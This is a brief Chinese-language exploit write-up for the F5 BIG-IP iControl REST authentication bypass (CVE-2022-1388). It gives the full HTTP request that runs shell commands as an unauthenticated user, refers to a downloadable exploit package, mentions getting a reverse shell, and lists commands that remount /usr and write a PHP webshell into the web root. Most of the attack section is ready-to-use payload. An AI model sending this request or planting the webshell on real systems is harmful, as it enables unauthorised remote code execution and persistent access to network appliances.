#
漏洞描述#
漏洞描述:
在 F5 BIG-IP 16.1.x 16.1.2.2 之前的版本、15.1.5.1 之前的 15.1.x 版本、14.1.4.6 之前的
14.1.x 版本、13.1.5 之前的 13.1.x 版本以及所有 12.1.x 和 11.6.x 版本,未公开的请求可能会绕过
iControl REST 身份验证。注意:未评估已达到技术支持终止 (EoTS) 的软件版本.
复现过程#
HTTP 请求包如下:
POST /mgmt/tm/util/bash HTTP/1.1
Host:xxxxxxx
Connection: keep-alive, x-F5-Auth-Token
X-F5-Auth-Token: anything
Authorization: Basic YWRtaW46
Content-Length: 45
Content-Type:application/json
{
"command":"run",
"utilCmdArgs":"-c id"
}
EXP/POC#
CVE-2022-1388-EXP-main.zip
Webshell 写入#
反弹获得了 shell。
Webshell 的写入可以参考另外一个漏洞 F5 BIG-IP CVE-2020-5902
写入的路径为:/usr/local/www
mount -o remount -rw /usr
echo "<?php phpinfo();?> " > /usr/local/www/test.php
mount -o remount -r /usr
访问路径:
参考#
F5 BIG-IP 远程代码执行漏洞复现(CVE-2020-5902)
CVE-2020-5902 BIG-IP RCE 分析研究